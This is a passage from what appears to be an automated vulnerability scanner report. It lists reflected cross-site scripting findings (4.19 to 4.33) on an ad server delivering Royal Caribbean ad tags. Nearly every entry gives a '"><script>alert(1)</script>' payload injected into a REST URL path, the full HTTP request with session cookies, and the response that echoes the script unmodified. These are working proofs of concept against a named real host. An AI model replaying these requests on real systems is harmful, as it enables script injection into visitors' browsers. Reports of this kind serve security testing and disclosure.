Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATT=TribalFusionB3; VolkswagenBTConq=UndertoneB3; optouts=cookies; RMOPTOUT=3; NSC_o4efm_qppm_iuuq=ffffffff09419e3f45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:42:39 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 337
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/RoyalCaribbean/ZAP743eb"><script>alert(1)</script>f2ee82d4d7a/851647094/x96/default/empty.gif/4d686437616b364a7258674142333038?x" target="_top">
...[SNIP]...
4.19. http://b3.mookie1.com/2/RoyalCaribbean/ZAP/1795641562@x96 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/RoyalCaribbean/ZAP/1795641562@x96

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 62c2c"><script>alert(1)</script>c817a57fe9f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/RoyalCaribbean/ZAP/1795641562@x9662c2c"><script>alert(1)</script>c817a57fe9f?_RM_HTML_title_=Prepare%20For%20Your%20Cruise%20Before%20You%20Board%20-%20Royal%20Caribbean%20International&_RM_HTML_url_=http%3A//www.royalcaribbean.com/beforeyouboard/home.do%3FcS%3DNAVBAR&_RM_HTML_referrer_=http%3A//www.royalcaribbean.com/home.do HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.royalcaribbean.com/beforeyouboard/home.do?cS=NAVBAR
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATT=TribalFusionB3; VolkswagenBTConq=UndertoneB3; optouts=cookies; RMOPTOUT=3; NSC_o4efm_qppm_iuuq=ffffffff09419e3f45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:42:41 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 330
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/RoyalCaribbean/ZAP/1219598856/x9662c2c"><script>alert(1)</script>c817a57fe9f/default/empty.gif/4d686437616b364a7258674142333038?x" target="_top">
...[SNIP]...
4.20. http://b3.mookie1.com/2/TRACK_Royalcaribbean/RC_Retargeting2_SX_Nonsecure@Bottom3 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TRACK_Royalcaribbean/RC_Retargeting2_SX_Nonsecure@Bottom3

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4bad9"><script>alert(1)</script>26608d2f524 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/TRACK_Royalcaribbean4bad9"><script>alert(1)</script>26608d2f524/RC_Retargeting2_SX_Nonsecure@Bottom3 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://fls.doubleclick.net/activityi;src=1740393;type=royal441;cat=rccom004;ord=5875754996668.548?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATT=TribalFusionB3; VolkswagenBTConq=UndertoneB3; optouts=cookies; RMOPTOUT=3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:42:01 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 372
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TRACK_Royalcaribbean4bad9"><script>alert(1)</script>26608d2f524/RC_Retargeting2_SX_Nonsecure/538165577/Bottom3/default/empty.gif/4d686437616b364a7258674142333038?x" target="_top">
...[SNIP]...
4.21. http://b3.mookie1.com/2/TRACK_Royalcaribbean/RC_Retargeting2_SX_Nonsecure@Bottom3 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TRACK_Royalcaribbean/RC_Retargeting2_SX_Nonsecure@Bottom3

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 436a1"><script>alert(1)</script>e78db836305 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/TRACK_Royalcaribbean/RC_Retargeting2_SX_Nonsecure@Bottom3436a1"><script>alert(1)</script>e78db836305 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://fls.doubleclick.net/activityi;src=1740393;type=royal441;cat=rccom004;ord=5875754996668.548?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATT=TribalFusionB3; VolkswagenBTConq=UndertoneB3; optouts=cookies; RMOPTOUT=3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:42:07 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 365
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TRACK_Royalcaribbean/RC_Retargeting2_SX_Nonsecure/1780256053/Bottom3436a1"><script>alert(1)</script>e78db836305/default/empty.gif/4d686437616b364a7258674142333038?x" target="_top">
...[SNIP]...
4.22. http://b3.mookie1.com/2/TRACK_Royalcaribbean/SiteOpt_CONV_SX_Secure@Bottom3 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TRACK_Royalcaribbean/SiteOpt_CONV_SX_Secure@Bottom3

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bdd48"><script>alert(1)</script>146028e605b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/TRACK_Royalcaribbeanbdd48"><script>alert(1)</script>146028e605b/SiteOpt_CONV_SX_Secure@Bottom3 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.royalcaribbean.com/home.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATT=TribalFusionB3; VolkswagenBTConq=UndertoneB3; optouts=cookies; RMOPTOUT=3; NSC_o4efm_qppm_iuuq=ffffffff09419e9045525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:42:09 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 366
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TRACK_Royalcaribbeanbdd48"><script>alert(1)</script>146028e605b/SiteOpt_CONV_SX_Secure/202946410/Bottom3/default/empty.gif/4d686437616b364a7258674142333038?x" target="_top">
...[SNIP]...
4.23. http://b3.mookie1.com/2/TRACK_Royalcaribbean/SiteOpt_CONV_SX_Secure@Bottom3 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TRACK_Royalcaribbean/SiteOpt_CONV_SX_Secure@Bottom3

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 52c9c"><script>alert(1)</script>b5422f86a26 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/TRACK_Royalcaribbean/SiteOpt_CONV_SX_Secure@Bottom352c9c"><script>alert(1)</script>b5422f86a26 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.royalcaribbean.com/home.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATT=TribalFusionB3; VolkswagenBTConq=UndertoneB3; optouts=cookies; RMOPTOUT=3; NSC_o4efm_qppm_iuuq=ffffffff09419e9045525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:42:15 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 359
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TRACK_Royalcaribbean/SiteOpt_CONV_SX_Secure/1826300607/Bottom352c9c"><script>alert(1)</script>b5422f86a26/default/empty.gif/4d686437616b364a7258674142333038?x" target="_top">
...[SNIP]...
4.24. http://b3.mookie1.com/2/royalcaribbean.com/beforeyouboard/home.do/2932448897@x95 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/royalcaribbean.com/beforeyouboard/home.do/2932448897@x95

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4348e"><script>alert(1)</script>84fc31623a1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/royalcaribbean.com4348e"><script>alert(1)</script>84fc31623a1/beforeyouboard/home.do/2932448897@x95?cS=NAVBAR&_RM_HTML_migValue_=&_RM_HTML_migTrans_= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.royalcaribbean.com/beforeyouboard/home.do?cS=NAVBAR
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATT=TribalFusionB3; VolkswagenBTConq=UndertoneB3; optouts=cookies; RMOPTOUT=3; NSC_o4efm_qppm_iuuq=ffffffff09419e3f45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:42:38 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 361
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/royalcaribbean.com4348e"><script>alert(1)</script>84fc31623a1/beforeyouboard/home.do/1876442626/x95/default/empty.gif/4d686437616b364a7258674142333038?x" target="_top">
...[SNIP]...
4.25. http://b3.mookie1.com/2/royalcaribbean.com/beforeyouboard/home.do/2932448897@x95 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/royalcaribbean.com/beforeyouboard/home.do/2932448897@x95

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 376fb"><script>alert(1)</script>65a17907e3f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/royalcaribbean.com/beforeyouboard376fb"><script>alert(1)</script>65a17907e3f/home.do/2932448897@x95?cS=NAVBAR&_RM_HTML_migValue_=&_RM_HTML_migTrans_= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.royalcaribbean.com/beforeyouboard/home.do?cS=NAVBAR
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATT=TribalFusionB3; VolkswagenBTConq=UndertoneB3; optouts=cookies; RMOPTOUT=3; NSC_o4efm_qppm_iuuq=ffffffff09419e3f45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:42:40 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 361
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/royalcaribbean.com/beforeyouboard376fb"><script>alert(1)</script>65a17907e3f/home.do/1854471174/x95/default/empty.gif/4d686437616b364a7258674142333038?x" target="_top">
...[SNIP]...
4.26. http://b3.mookie1.com/2/royalcaribbean.com/beforeyouboard/home.do/2932448897@x95 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/royalcaribbean.com/beforeyouboard/home.do/2932448897@x95

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 71986"><script>alert(1)</script>39fbfdcbd35 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/royalcaribbean.com/beforeyouboard/home.do71986"><script>alert(1)</script>39fbfdcbd35/2932448897@x95?cS=NAVBAR&_RM_HTML_migValue_=&_RM_HTML_migTrans_= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.royalcaribbean.com/beforeyouboard/home.do?cS=NAVBAR
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATT=TribalFusionB3; VolkswagenBTConq=UndertoneB3; optouts=cookies; RMOPTOUT=3; NSC_o4efm_qppm_iuuq=ffffffff09419e3f45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:42:42 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 361
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/royalcaribbean.com/beforeyouboard/home.do71986"><script>alert(1)</script>39fbfdcbd35/1057094292/x95/default/empty.gif/4d686437616b364a7258674142333038?x" target="_top">
...[SNIP]...
4.27. http://b3.mookie1.com/2/royalcaribbean.com/beforeyouboard/home.do/2932448897@x95 [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/royalcaribbean.com/beforeyouboard/home.do/2932448897@x95

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 69e7f"><script>alert(1)</script>3b5492b8b5f was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/royalcaribbean.com/beforeyouboard/home.do/2932448897@x9569e7f"><script>alert(1)</script>3b5492b8b5f?cS=NAVBAR&_RM_HTML_migValue_=&_RM_HTML_migTrans_= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.royalcaribbean.com/beforeyouboard/home.do?cS=NAVBAR
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATT=TribalFusionB3; VolkswagenBTConq=UndertoneB3; optouts=cookies; RMOPTOUT=3; NSC_o4efm_qppm_iuuq=ffffffff09419e3f45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:42:45 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 353
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/royalcaribbean.com/beforeyouboard/home.do/1755156653/x9569e7f"><script>alert(1)</script>3b5492b8b5f/default/empty.gif/4d686437616b364a7258674142333038?x" target="_top">
...[SNIP]...
4.28. http://b3.mookie1.com/2/royalcaribbean.com/dealsandmore/hotdeals.do/0246060285@x95 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/royalcaribbean.com/dealsandmore/hotdeals.do/0246060285@x95

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8bda1"><script>alert(1)</script>bf5c31379dc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/royalcaribbean.com8bda1"><script>alert(1)</script>bf5c31379dc/dealsandmore/hotdeals.do/0246060285@x95?cS=NAVBAR&pnav=3&snav=1&_RM_HTML_migValue_=&_RM_HTML_migTrans_= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.royalcaribbean.com/dealsandmore/hotdeals.do?cS=NAVBAR&pnav=3&snav=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATT=TribalFusionB3; VolkswagenBTConq=UndertoneB3; NSC_o4efm_qppm_iuuq=ffffffff09419e3f45525d5f4f58455e445a4a423660; optouts=cookies; RMOPTOUT=3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:45:30 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 361
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/royalcaribbean.com8bda1"><script>alert(1)</script>bf5c31379dc/dealsandmore/hotdeals.do/28155463/x95/default/empty.gif/4d686437616b364a7258674142333038?x" target="_top">
...[SNIP]...
4.29. http://b3.mookie1.com/2/royalcaribbean.com/dealsandmore/hotdeals.do/0246060285@x95 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/royalcaribbean.com/dealsandmore/hotdeals.do/0246060285@x95

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e00b5"><script>alert(1)</script>16045c277b7 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/royalcaribbean.com/dealsandmoree00b5"><script>alert(1)</script>16045c277b7/hotdeals.do/0246060285@x95?cS=NAVBAR&pnav=3&snav=1&_RM_HTML_migValue_=&_RM_HTML_migTrans_= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.royalcaribbean.com/dealsandmore/hotdeals.do?cS=NAVBAR&pnav=3&snav=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATT=TribalFusionB3; VolkswagenBTConq=UndertoneB3; NSC_o4efm_qppm_iuuq=ffffffff09419e3f45525d5f4f58455e445a4a423660; optouts=cookies; RMOPTOUT=3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:45:33 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 362
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/royalcaribbean.com/dealsandmoree00b5"><script>alert(1)</script>16045c277b7/hotdeals.do/997504606/x95/default/empty.gif/4d686437616b364a7258674142333038?x" target="_top">
...[SNIP]...
4.30. http://b3.mookie1.com/2/royalcaribbean.com/dealsandmore/hotdeals.do/0246060285@x95 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/royalcaribbean.com/dealsandmore/hotdeals.do/0246060285@x95

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5ccd9"><script>alert(1)</script>28b9d527268 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/royalcaribbean.com/dealsandmore/hotdeals.do5ccd9"><script>alert(1)</script>28b9d527268/0246060285@x95?cS=NAVBAR&pnav=3&snav=1&_RM_HTML_migValue_=&_RM_HTML_migTrans_= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.royalcaribbean.com/dealsandmore/hotdeals.do?cS=NAVBAR&pnav=3&snav=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATT=TribalFusionB3; VolkswagenBTConq=UndertoneB3; NSC_o4efm_qppm_iuuq=ffffffff09419e3f45525d5f4f58455e445a4a423660; optouts=cookies; RMOPTOUT=3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:45:35 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 363
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/royalcaribbean.com/dealsandmore/hotdeals.do5ccd9"><script>alert(1)</script>28b9d527268/1534640086/x95/default/empty.gif/4d686437616b364a7258674142333038?x" target="_top">
...[SNIP]...
4.31. http://b3.mookie1.com/2/royalcaribbean.com/dealsandmore/hotdeals.do/0246060285@x95 [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/royalcaribbean.com/dealsandmore/hotdeals.do/0246060285@x95

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 41da4"><script>alert(1)</script>22e0f1b1f7c was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/royalcaribbean.com/dealsandmore/hotdeals.do/0246060285@x9541da4"><script>alert(1)</script>22e0f1b1f7c?cS=NAVBAR&pnav=3&snav=1&_RM_HTML_migValue_=&_RM_HTML_migTrans_= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.royalcaribbean.com/dealsandmore/hotdeals.do?cS=NAVBAR&pnav=3&snav=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATT=TribalFusionB3; VolkswagenBTConq=UndertoneB3; NSC_o4efm_qppm_iuuq=ffffffff09419e3f45525d5f4f58455e445a4a423660; optouts=cookies; RMOPTOUT=3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:45:37 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 353
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/royalcaribbean.com/dealsandmore/hotdeals.do/36049341/x9541da4"><script>alert(1)</script>22e0f1b1f7c/default/empty.gif/4d686437616b364a7258674142333038?x" target="_top">
...[SNIP]...
4.32. http://b3.mookie1.com/2/royalcaribbean.com/home.do/6905219797@x95 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/royalcaribbean.com/home.do/6905219797@x95

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 92afc"><script>alert(1)</script>b2d568f1b6d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/royalcaribbean.com92afc"><script>alert(1)</script>b2d568f1b6d/home.do/6905219797@x95?_RM_HTML_migValue_=&_RM_HTML_migTrans_= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.royalcaribbean.com/home.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATT=TribalFusionB3; VolkswagenBTConq=UndertoneB3; optouts=cookies; RMOPTOUT=3; NSC_o4efm_qppm_iuuq=ffffffff09419e9045525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:42:23 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 346
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/royalcaribbean.com92afc"><script>alert(1)</script>b2d568f1b6d/home.do/1432671807/x95/default/empty.gif/4d686437616b364a7258674142333038?x" target="_top">
...[SNIP]...
4.33. http://b3.mookie1.com/2/royalcaribbean.com/home.do/6905219797@x95 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/royalcaribbean.com/home.do/6905219797@x95

Issue detail

